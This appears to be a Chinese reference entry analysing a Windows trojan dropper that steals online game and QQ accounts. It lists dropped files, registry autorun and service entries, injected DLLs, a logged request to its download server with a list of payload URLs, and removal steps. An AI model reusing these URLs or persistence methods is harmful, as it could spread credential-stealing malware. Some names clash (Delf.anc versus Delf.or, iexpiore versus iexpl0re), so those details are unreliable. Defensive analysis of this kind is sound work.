Trojan-Dropper.Win32.Delf.anc

該病毒運行後,病毒衍生檔案到系統目錄下,連線某伺服器獲得要下載病毒的地址到本機運行。添加註冊表自動運行項與服務項以隨機引導病毒體。該病毒主要為盜取用戶遊戲賬號為主。包括征途、傳奇、QQ、熱血江湖等。

基本介紹

  • 中文名:武漢男生變種
  • 外文名:Trojan-Dropper.Win32.Delf.or
  • 病毒類型:木馬類
  • 詞語分類:計算機用語
  • 公開範圍:完全公開
  • 危害等級:中等
基本信息,清除方案,

基本信息

病毒名稱: Trojan-Dropper.Win32.Delf.or
中文名稱: 武漢男生變種
病毒類型: 木馬類
檔案 MD5: DD26CCAD1848DE5663F0B8892EB4DAE5
公開範圍: 完全公開
危害等級: 中等
檔案長度: 75,269 位元組
感染系統: Win98以上系統
開發工具: Borland Delphi 6.0 - 7.0
加殼類型: nSPack 2.1 - 2.5 ->North Star/Liu Xing Ping [Overlay]
ASPack 2.x (without poly) ->Alexey Solodovnikov
命名對照: 驅逐艦[BackDoor.Pegion.516]
瑞星[Worm.Nimaya.al]
行為分析
1、衍生下列副本與檔案
%Windir%\ tembay.exe
%Windir%\ly.exe
%Windir%\my.exe
%Windir%\wanmei.exe
%Windir%\wl.exe
%System32%\1.exe
%System32%\2.exe
%System32%\Security.exe
%System32%\iexpl0re.exe
%System32%\userspi.dll
%System32%\wdfmgr32.exe
%System32%\windhcp.ocx
%System32%\winlogin.exe
%System32%\wsvbs.dll
%System32%\twunk32.exe
%System32%\dirvers\ usbme.sys
%System32%\dirvers\ spoclsv.exe
%ProgramFiles%\ Desktop_.ini
2、新建註冊表鍵值
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\policies\Explorer\Run\twin 鍵值: 字元串: "%WINDIR%
\system32\twunk32.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Run\2ls1essru 鍵值: 字元串: "%WINDIR%\iexpiore.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Run\wsvbs 鍵值: 字元串: "%WINDIR%\wanmei.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Run\svcshare
鍵值: 字元串: "%WINDIR%\system32\drivers\spoclsv.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
\Run\SymhMy
鍵值: 字元串: "%WINDIR%\system32\iexpl0re.exe"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ServerAC
\Description
鍵值: 字元串: "給予本地帳戶高級保護機制。"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ServerAC
\DisplayName
鍵值: 字元串: "Server Advance"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ServerAC
\ImagePath
鍵值: 類型: REG_EXPAND_SZ 長度: 33 (0x21) 位元組
%WINDIR%\system32\Security.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc
\Description 鍵值: 字元串: "為遠程計算機註冊並更新 IP 地址。"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc
\DisplayName 鍵值: 字元串: "Windows DHCP Service"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc
\ImagePath 鍵值: 類型: REG_EXPAND_SZ 長度: 52 (0x34) 位元組
%WINDIR%\system32\\rundll32.exe windhcp.ocx
3、連線某伺服器地址獲得要下載的病毒體地址:
www.krvkr.com(58.215.79.164)
www.whboy.net(58.215.79.64)
GET /update/wormcn.txt
User-Agent: QQ
Host: www.whboy.net
wormcn.txt內容:
http://www.krvkr.com/down/cq.exe
http://www.krvkr.com/down/ly.exe
http://www.krvkr.com/down/my.exe
http://www.krvkr.com/down/rx.exe
http://www.krvkr.com/down/wl.exe
http://www.krvkr.com/down/wow.exe
http://www.krvkr.com/down/zt.exe
http://www.krvkr.com/down/wanmei.exe
http://www.krvkr.com/down/dj.exe
http://www.krvkr.com/down/kr/wikibay.exe
4、插入執行緒
windhcp.ocx 到 explorer.exe進程
userspi.dll 到 explorer.exe進程
wsvbs.dll 到 explorer.exe進程
註:% System%是一個:可變路徑。病毒通過查詢作業系統來決定當前System資料夾的位置。Windows2000/NT中默認的安裝路徑是C:\Winnt\System32,windows95/98/me中默認的安裝路徑是C:\Windows\System,windowsXP中默認的安裝路徑是C:\Windows\System32。
--------------------------------------------------------------------------------

清除方案

1、使用安天木馬防線可徹底清除此病毒(推薦)
2、手工清除請按照行為分析刪除對應檔案,恢復相關係統設定。
(1) 使用安天木馬防線“進程管理”關閉病毒進程
spoclsv.exe
iexpl0re.exe
(2) 使用安天木馬防線禁用下列服務:
Server Advance
(3) 找到下列註冊表鍵值
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinDHCPsvc
ImagePath: %WINDdir\system32\\rundll32.exe windhcp.ocx,start
修改為:
ImagePath: %WINDdir\system32\\rundll32.exe
(4) 刪除下列檔案
%Windir%\ tembay.exe
%Windir%\ly.exe
%Windir%\my.exe
%Windir%\wanmei.exe
%Windir%\wl.exe
%System32%\1.exe
%System32%\2.exe
%System32%\Security.exe
%System32%\iexpl0re.exe
%System32%\userspi.dll
%System32%\wdfmgr32.exe
%System32%\windhcp.ocx
%System32%\winlogin.exe
%System32%\wsvbs.dll
%System32%\twunk32.exe
%System32%\dirvers\ usbme.sys
%System32%\dirvers\ spoclsv.exe
%ProgramFiles%\ Desktop_.ini
(5) 恢復病毒修改的註冊表項目,刪除病毒添加的註冊表項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\policies\Explorer\Run\twin 鍵值: 字元串: "%WINDIR%\system32\twunk32.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\2ls1essru 鍵值: 字元串: "%WINDIR%\iexpiore.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\wsvbs 鍵值: 字元串: "%WINDIR%\wanmei.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
\svcshare 鍵值: 字元串: "%WINDIR%\system32\drivers\spoclsv.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
\SymhMy 鍵值: 字元串: "%WINDIR%\system32\iexpl0re.exe"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ServerAC
註:病毒可能會導致用戶多次重啟,用戶可儘快嘗試刪除註冊表自動運行項。一段時間後即可按正常步驟刪除病毒檔案。

相關詞條

熱門詞條

聯絡我們